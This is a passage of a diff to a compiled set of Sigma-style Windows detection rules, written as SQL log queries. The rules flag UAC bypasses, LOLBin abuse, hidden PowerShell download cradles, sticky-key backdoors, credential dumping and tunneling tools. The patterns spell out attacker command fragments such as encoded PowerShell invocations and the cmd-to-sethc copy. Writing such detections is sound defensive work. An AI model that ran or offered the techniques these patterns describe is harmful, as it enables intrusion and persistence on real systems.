'System'))" ], - "filename": "proc_creation_win_lolbin_pressaynkey.yml" + "filename": "proc_creation_win_uac_bypass_wsreset_integrity_level.yml" }, { - "title": "Remote Access Tool - ScreenConnect Backstage Mode Anomaly", - "id": "7b582f1a-b318-4c6a-bf4e-66fe49bf55a5", + "title": "PUA - Process Hacker / System Informer Execution", + "id": 
"811e0002-b13b-4a15-9d00-a613fce66e42", "status": "experimental", - "description": "Detects suspicious sub processes started by the ScreenConnect client service, which indicates the use of the so-called Backstage mode", + "description": "Detects suspicious use of Process Hacker and its newer version named System Informer, a tool to view and manipulate processes, kernel options and other low level stuff", "author": "Florian Roth (Nextron Systems)", - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], "falsepositives": [ - "Case in which administrators are allowed to use ScreenConnect's Backstage mode" + "Sometimes used by developers or system administrators for debugging purposes" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%ScreenConnect.ClientService.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ProcessHacker\\_%' ESCAPE '\\' OR (Image LIKE '%\\\\SystemInformer.exe' ESCAPE '\\' OR Image LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\') OR OriginalFileName IN ('ProcessHacker.exe', 'Process Hacker', 'SystemInformer.exe') OR Description IN ('Process Hacker', 'System Informer') OR Product = 'Process Hacker' OR (Hashes LIKE '%MD5=68F9B52895F4D34E74112F3129B3B00D%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C5E2018BF7C0F314FED4FD7FE7E69FA2E648359E%' ESCAPE '\\' OR Hashes LIKE '%SHA256=D4A0FE56316A2C45B9BA9AC1005363309A3EDC7ACF9E4DF64D326A0FF273E80F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=04DE0AD9C37EB7BD52043D2ECAC958DF%' ESCAPE '\\' OR Hashes LIKE '%MD5=B365AF317AE730A67C936F21432B9C71%' ESCAPE '\\' OR Hashes LIKE '%SHA1=A0BDFAC3CE1880B32FF9B696458327CE352E3B1D%' ESCAPE '\\' OR Hashes LIKE 
'%SHA256=BD2C2CF0631D881ED382817AFCCE2B093F4E412FFB170A719E2762F250ABFEA4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3695333C60DEDECDCAFF1590409AA462%' ESCAPE '\\') OR md5 IN ('68f9b52895f4d34e74112f3129b3b00d', 'b365af317ae730a67c936f21432b9c71') OR sha1 IN ('c5e2018bf7c0f314fed4fd7fe7e69fa2e648359e', 'a0bdfac3ce1880b32ff9b696458327ce352e3b1d') OR sha256 IN ('d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f', 'bd2c2cf0631d881ed382817afcce2b093f4e412ffb170a719e2762f250abfea4') OR Imphash IN ('04de0ad9c37eb7bd52043d2ecac958df', '3695333c60dedecdcaff1590409aa462')))" ], - "filename": "proc_creation_win_remote_access_tools_screenconnect_anomaly.yml" + "filename": "proc_creation_win_pua_process_hacker.yml" }, { - "title": "Wlrmdr Lolbin Use as Launcher", - "id": "9cfc00b6-bfb7-49ce-9781-ef78503154bb", + "title": "Suspicious Electron Application Child Processes", + "id": "f26eb764-fd89-464b-85e2-dc4a8e6e77b8", "status": "experimental", - "description": "Detects use of Wlrmdr.exe in which the -u parameter is passed to ShellExecute", - "author": "frack113, manasmbellani", + "description": "Detects suspicious child processes of electron apps (teams, discord, slack...).\nThis could be a potential sign of \".asar\" file tampering (See reference section for more information)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.execution" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR (((Image LIKE '%\\\\wlrmdr.exe' ESCAPE '\\' OR OriginalFileName = 'WLRMNDR.EXE') AND (CommandLine LIKE '%-s %' ESCAPE '\\' AND CommandLine LIKE '%-f %' ESCAPE '\\' AND CommandLine LIKE '%-t %' ESCAPE '\\' AND CommandLine LIKE '%-m %' ESCAPE '\\' AND CommandLine LIKE '%-a %' ESCAPE '\\' AND CommandLine LIKE '%-u %' ESCAPE '\\')) AND NOT 
((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\winlogon.exe' ESCAPE '\\') OR (ParentImage = '-')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ParentImage LIKE '%\\\\Teams.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\slack.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\discord.exe' ESCAPE '\\') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\Discord.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\NVSMI\\\\nvidia-smi.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_wlrmdr.yml" + "filename": "proc_creation_win_susp_electron_app_children.yml" }, { - "title": "ETW Logging Tamper In .NET Processes", - "id": "41421f44-58f9-455d-838a-c398859841d4", - "status": "test", - "description": "Detects changes to environment variables related to ETW logging. 
This could indicate potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Windows Internet Hosted WebDav Share Mount Via Net.EXE", + "id": "7e6237fe-3ddb-438f-9381-9bf9de5af8d0", + "status": "experimental", + "description": "Detects when an internet hosted webdav share is mounted using the \"net.exe\" utility", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%COMPlus\\_ETWEnabled%' ESCAPE '\\' OR CommandLine LIKE '%COMPlus\\_ETWFlags%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% http%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_etw_modification_cmdline.yml" + "filename": "proc_creation_win_net_use_mount_internet_share.yml" }, { - "title": "Suspicious PowerShell Invocations - Specific - ProcessCreation", - "id": "536e2947-3729-478c-9903-745aaffe60d2", + "title": "Suspicious Schtasks Schedule Types", + "id": "24c8392b-aa3c-46b7-a545-43f71657fe98", "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", + "description": "Detects scheduled task creations or modification on a suspicious schedule type", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "Legitimate processes that run at logon. 
Filter according to your environment" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%-nop%' ESCAPE '\\' AND CommandLine LIKE '% -w %' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '% -c %' ESCAPE '\\' AND CommandLine LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (CommandLine LIKE '% -w %' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '%-noni%' ESCAPE '\\' AND CommandLine LIKE '%-nop%' ESCAPE '\\' AND CommandLine LIKE '% -c %' ESCAPE '\\' AND CommandLine LIKE '%iex%' ESCAPE '\\' AND CommandLine LIKE '%New-Object%' ESCAPE '\\') OR (CommandLine LIKE '% -w %' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '%-ep%' ESCAPE '\\' AND CommandLine LIKE '%bypass%' ESCAPE '\\' AND CommandLine LIKE '%-Enc%' ESCAPE '\\') OR (CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%reg%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%\\\\software\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%bypass%' ESCAPE '\\' AND CommandLine LIKE '%-noprofile%' ESCAPE '\\' AND CommandLine LIKE '%-windowstyle%' ESCAPE '\\' AND CommandLine LIKE '%hidden%' ESCAPE '\\' AND CommandLine LIKE '%new-object%' ESCAPE '\\' AND CommandLine LIKE '%system.net.webclient%' ESCAPE '\\' AND CommandLine LIKE '%.download%' ESCAPE '\\') OR (CommandLine LIKE '%iex%' ESCAPE '\\' AND CommandLine LIKE '%New-Object%' ESCAPE '\\' AND CommandLine LIKE '%Net.WebClient%' ESCAPE '\\' AND CommandLine LIKE '%.Download%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\schtasks.exe' 
ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '% ONLOGON %' ESCAPE '\\' OR CommandLine LIKE '% ONSTART %' ESCAPE '\\' OR CommandLine LIKE '% ONCE %' ESCAPE '\\' OR CommandLine LIKE '% ONIDLE %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%HIGHEST%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_invocation_specific.yml" + "filename": "proc_creation_win_schtasks_schedule_type.yml" }, { - "title": "HackTool - Jlaive In-Memory Assembly Execution", - "id": "0a99eb3e-1617-41bd-b095-13dc767f3def", + "title": "Suspicious Manipulation Of Default Accounts Via Net.EXE", + "id": "5b768e71-86f2-4879-b448-81061cbae951", "status": "experimental", - "description": "Detects the use of Jlaive to execute assemblies in a copied PowerShell", - "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", + "description": "Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.003" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unknown" + "Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your env. 
If you experience a lot of FP you could reduce the level to medium" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%.bat' ESCAPE '\\') AND ((Image LIKE '%\\\\xcopy.exe' ESCAPE '\\' AND CommandLine LIKE '%powershell.exe%' ESCAPE '\\' AND CommandLine LIKE '%.bat.exe%' ESCAPE '\\') OR (Image LIKE '%\\\\xcopy.exe' ESCAPE '\\' AND CommandLine LIKE '%pwsh.exe%' ESCAPE '\\' AND CommandLine LIKE '%.bat.exe%' ESCAPE '\\') OR (Image LIKE '%\\\\attrib.exe' ESCAPE '\\' AND CommandLine LIKE '%+s%' ESCAPE '\\' AND CommandLine LIKE '%+h%' ESCAPE '\\' AND CommandLine LIKE '%.bat.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND CommandLine LIKE '% user %' ESCAPE '\\' AND (CommandLine LIKE '% Järjestelmänvalvoja %' ESCAPE '\\' OR CommandLine LIKE '% Rendszergazda %' ESCAPE '\\' OR CommandLine LIKE '% Администратор %' ESCAPE '\\' OR CommandLine LIKE '% Administrateur %' ESCAPE '\\' OR CommandLine LIKE '% Administrador %' ESCAPE '\\' OR CommandLine LIKE '% Administratör %' ESCAPE '\\' OR CommandLine LIKE '% Administrator %' ESCAPE '\\' OR CommandLine LIKE '% guest %' ESCAPE '\\' OR CommandLine LIKE '% DefaultAccount %' ESCAPE '\\' OR CommandLine LIKE '% \"Järjestelmänvalvoja\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Rendszergazda\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Администратор\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrateur\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrador\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administratör\" %' ESCAPE '\\' OR CommandLine LIKE '% \"Administrator\" %' ESCAPE '\\' OR CommandLine LIKE '% \"guest\" %' ESCAPE '\\' OR CommandLine LIKE '% 
\"DefaultAccount\" %' ESCAPE '\\' OR CommandLine LIKE '% ''Järjestelmänvalvoja'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Rendszergazda'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Администратор'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrateur'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrador'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administratör'' %' ESCAPE '\\' OR CommandLine LIKE '% ''Administrator'' %' ESCAPE '\\' OR CommandLine LIKE '% ''guest'' %' ESCAPE '\\' OR CommandLine LIKE '% ''DefaultAccount'' %' ESCAPE '\\')) AND NOT (CommandLine LIKE '%guest%' ESCAPE '\\' AND CommandLine LIKE '%/active no%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_jlaive_batch_execution.yml" + "filename": "proc_creation_win_net_default_accounts_manipulation.yml" }, { - "title": "Deny Service Access Using Security Descriptor Tampering Via Sc.EXE", - "id": "99cf1e02-00fb-4c0d-8375-563f978dfd37", - "status": "test", - "description": "Detects suspicious DACL modifications to deny access to a service that affects critical trustees. 
This can be used to hide services or make them unstoppable.", - "author": "Jonhnathan Ribeiro, oscd.community", + "title": "Potential Recon Activity Via Nltest.EXE", + "id": "5cc90652-4cbd-4241-aa3b-4b462fa5a248", + "status": "experimental", + "description": "Detects nltest commands that can be used for information discovery", + "author": "Craig Young, oscd.community, Georg Lauenstein", "tags": [ - "attack.persistence", - "attack.t1543.003" + "attack.discovery", + "attack.t1016", + "attack.t1482" ], "falsepositives": [ - "Unknown" + "Legitimate administration use but user and host must be investigated" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' OR OriginalFileName = 'sc.exe') AND (CommandLine LIKE '%sdset%' ESCAPE '\\' AND CommandLine LIKE '%D;%' ESCAPE '\\') AND (CommandLine LIKE '%;IU%' ESCAPE '\\' OR CommandLine LIKE '%;SU%' ESCAPE '\\' OR CommandLine LIKE '%;BA%' ESCAPE '\\' OR CommandLine LIKE '%;SY%' ESCAPE '\\' OR CommandLine LIKE '%;WD%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\nltest.exe' ESCAPE '\\' OR OriginalFileName = 'nltestrk.exe') AND ((CommandLine LIKE '%/server%' ESCAPE '\\' AND CommandLine LIKE '%/query%' ESCAPE '\\') OR (CommandLine LIKE '%/dclist:%' ESCAPE '\\' OR CommandLine LIKE '%/parentdomain%' ESCAPE '\\' OR CommandLine LIKE '%/domain\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/all\\_trusts%' ESCAPE '\\' OR CommandLine LIKE '%/trusted\\_domains%' ESCAPE '\\' OR CommandLine LIKE '%/user%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sc_sdset_deny_service_access.yml" + "filename": "proc_creation_win_nltest_recon.yml" }, { - "title": "Network Reconnaissance Activity", - "id": "e6313acd-208c-44fc-a0ff-db85d572e90e", + "title": "UAC Bypass Using ChangePK and SLUI", + "id": "503d581c-7df0-4bbe-b9be-5840c0ecc1fc", 
"status": "test", - "description": "Detects a set of suspicious network related commands often used in recon stages", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects an UAC bypass that uses changepk.exe and slui.exe (UACMe 61)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1087", - "attack.t1082", - "car.2016-03-001" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "False positives depend on scripts and administrative tools used in the monitored environment" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%nslookup%' ESCAPE '\\' AND CommandLine LIKE '%\\_ldap.\\_tcp.dc.\\_msdcs.%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\changepk.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\slui.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_nslookup_domain_discovery.yml" + "filename": "proc_creation_win_uac_bypass_changepk_slui.yml" }, { - "title": "Suspicious Whoami.EXE Execution", - "id": "c30fb093-1109-4dc8-88a8-b30d11c95a5d", + "title": "Execution from Suspicious Folder", + "id": "3dfd06d2-eaf4-4532-9555-68aca59f57c4", "status": "experimental", - "description": "Detects the execution of \"whoami.exe\" with the \"/all\" flag or with redirection options to export the results to a file for later use.", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects a suspicious execution from an uncommon folder", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ - "attack.discovery", - "attack.t1033", - "car.2016-03-001" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT 
* FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% -all%' ESCAPE '\\' OR CommandLine LIKE '% /all%' ESCAPE '\\' OR CommandLine LIKE '% /FO CSV%' ESCAPE '\\' OR CommandLine LIKE '% -FO CSV%' ESCAPE '\\')) OR (CommandLine LIKE '%whoami%' ESCAPE '\\' AND CommandLine LIKE '%>%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\config\\\\systemprofile\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Intel\\\\Logs\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\RSA\\\\MachineKeys\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\All Users\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Default\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\NetworkService\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\addins\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\debug\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Help\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\IME\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Media\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\repair\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\security\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\') OR Image LIKE 'C:\\\\Perflogs\\\\%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Users\\\\Public\\\\IBM\\\\ClientSolutions\\\\Start\\_Programs\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\config\\\\systemprofile\\\\Citrix\\\\UpdaterBinaries\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\CitrixReceiverUpdater.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_whoami_susp_flags.yml" + "filename": 
"proc_creation_win_susp_execution_path.yml" }, { - "title": "Dumping Process via Sqldumper.exe", - "id": "23ceaf5c-b6f1-4a32-8559-f2ff734be516", - "status": "test", - "description": "Detects process dump via legitimate sqldumper.exe binary", - "author": "Kirill Kiryanov, oscd.community", + "title": "Suspicious Cabinet File Execution Via Msdt.EXE", + "id": "dc4576d4-7467-424f-9eee-fd2b02855fe0", + "status": "experimental", + "description": "Detects execution of msdt.exe using the \"cab\" flag which could indicates suspicious diagcab files with embedded answer files leveraging CVE-2022-30190", + "author": "Nasreddine Bencherchali (Nextron Systems), GossiTheDog, frack113", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Legitimate MSSQL Server actions" + "Legitimate usage of \".diagcab\" files" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\sqldumper.exe' ESCAPE '\\' AND (CommandLine LIKE '%0x0110%' ESCAPE '\\' OR CommandLine LIKE '%0x01100:40%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe') AND (CommandLine LIKE '% /cab %' ESCAPE '\\' OR CommandLine LIKE '% -cab %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_sqldumper_activity.yml" + "filename": "proc_creation_win_msdt_susp_cab_options.yml" }, { - "title": "PUA - Chisel Tunneling Tool Execution", - "id": "8b0e12da-d3c3-49db-bb4f-256703f380e5", + "title": "Persistence Via Sticky Key Backdoor", + "id": "1070db9a-3e5d-412e-8e7b-7183b616e1b3", "status": "experimental", - "description": "Detects usage of the Chisel tunneling tool via the commandline arguments", - "author": "Florian Roth (Nextron Systems)", + "description": "By replacing the sticky keys executable with the local 
admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.\nWhen the sticky keys are \"activated\" the privilleged shell is launched.\n", + "author": "Sreeman", "tags": [ - "attack.command_and_control", - "attack.t1090.001" + "attack.t1546.008", + "attack.privilege_escalation" ], "falsepositives": [ - "Some false positives may occur with other tools with similar commandlines" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\chisel.exe' ESCAPE '\\' OR ((CommandLine LIKE '%exe client %' ESCAPE '\\' OR CommandLine LIKE '%exe server %' ESCAPE '\\') AND (CommandLine LIKE '%-socks5%' ESCAPE '\\' OR CommandLine LIKE '%-reverse%' ESCAPE '\\' OR CommandLine LIKE '% r:%' ESCAPE '\\' OR CommandLine LIKE '%:127.0.0.1:%' ESCAPE '\\' OR CommandLine LIKE '%-tls-skip-verify %' ESCAPE '\\' OR CommandLine LIKE '%:socks%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%/y %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\cmd.exe C:\\\\windows\\\\system32\\\\sethc.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_pua_chisel.yml" + "filename": "proc_creation_win_cmd_sticky_keys_replace.yml" }, { - "title": "Suspicious Msiexec Execute Arbitrary DLL", - "id": "6f4191bb-912b-48a8-9ce7-682769541e6d", - "status": "experimental", - "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", - "author": "frack113", + "title": "Suspicious Compression Tool Parameters", + "id": "27a72a60-7e5e-47b1-9d17-909c9abafdcd", + "status": "test", + "description": "Detects 
suspicious command line arguments of common data compression tools", + "author": "Florian Roth (Nextron Systems), Samir Bousseaden", "tags": [ - "attack.defense_evasion", - "attack.t1218.007" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND (CommandLine LIKE '% /y%' ESCAPE '\\' OR CommandLine LIKE '% -y%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files (x86)\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\ScriptingObjectModel.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\SoftwareUpdateAdmin.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y \"C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" /Y C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files (x86)\\\\Bonjour\\\\mdnsNSP.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\ScriptingObjectModel.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Program Files (x86)\\\\Apple Software Update\\\\SoftwareUpdateAdmin.dll%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y \"C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\MsiExec.exe\" -Y C:\\\\Windows\\\\CCM\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') 
AND ((OriginalFileName LIKE '7z%.exe' ESCAPE '\\' OR OriginalFileName LIKE '%rar.exe' ESCAPE '\\' OR OriginalFileName LIKE '%Command%Line%RAR%' ESCAPE '\\') AND (CommandLine LIKE '% -p%' ESCAPE '\\' OR CommandLine LIKE '% -ta%' ESCAPE '\\' OR CommandLine LIKE '% -tb%' ESCAPE '\\' OR CommandLine LIKE '% -sdel%' ESCAPE '\\' OR CommandLine LIKE '% -dw%' ESCAPE '\\' OR CommandLine LIKE '% -hp%' ESCAPE '\\')) AND NOT (ParentImage LIKE 'C:\\\\Program%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_msiexec_execute_dll.yml" + "filename": "proc_creation_win_susp_compression_params.yml" }, { - "title": "File Download Via Curl.EXE", - "id": "9a517fca-4ba3-4629-9278-a68694697b81", - "status": "experimental", - "description": "Detects file download using curl.exe", + "title": "Potential MsiExec Masquerading", + "id": "e22a6eb2-f8a5-44b5-8b44-a2dbd47b1144", + "status": "test", + "description": "Detects the execution of msiexec.exe from an uncommon directory", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1036.005" ], "falsepositives": [ - "Scripts created by developers and admins", - "Administrative activity", - "The \"\\Git\\usr\\bin\\sh.exe\" process uses the \"--output\" flag to download a specific file in the temp directory with the pattern \"gfw-httpget-xxxxxxxx.txt \"" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 